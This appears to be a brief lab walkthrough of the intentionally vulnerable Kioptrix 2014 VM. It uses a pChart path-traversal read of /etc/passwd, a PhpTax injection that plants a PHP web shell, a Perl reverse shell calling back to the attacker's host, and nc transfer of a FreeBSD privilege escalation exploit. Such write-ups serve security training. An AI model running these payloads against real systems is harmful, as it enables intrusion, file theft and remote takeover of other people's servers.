Remote Code Execution kioptrix 2014

Remote Code Execution

Get VMs IP:

arp-scan --localnet

Enumeration:

nmap -A 192.168.85.145

LFI:

http://192.168.85.145/pChart2.1.3/examples/index.php?Action=View&Script=/../../etc/passwd
http://192.168.85.145/pChart2.1.3/examples/index.php?Action=View&Script=/../../usr/local/etc/apache22/httpd.conf
https://www.exploit-db.com/exploits/31173/

CURL:

curl -H "User-Agent:Mozilla/4.0" http://192.168.85.145:8080

RCE:

PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution
https://www.exploit-db.com/exploits/25849/
http://192.168.85.145:8080/phptax/index.php?field=rce.php&newvalue=<?php passthru($_GET[cmd]);?>

http://192.168.85.145:8080/phptax/data/rce.php?cmd=id

uid=80(www) gid=80(www) groups=80(www)

http://192.168.85.145:8080/phptax/data/rce.php?cmd=perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.85.144:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Privilege Escalation:

searchsploit freebsd 9.0
FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation
https://www.exploit-db.com/exploits/26368/

nc -lvp 1111 < 26368.c
nc -n 192.168.85.144 1111 > 26368.c
gcc 26368.c -o prives

Header Ads

Remote Code Execution kioptrix 2014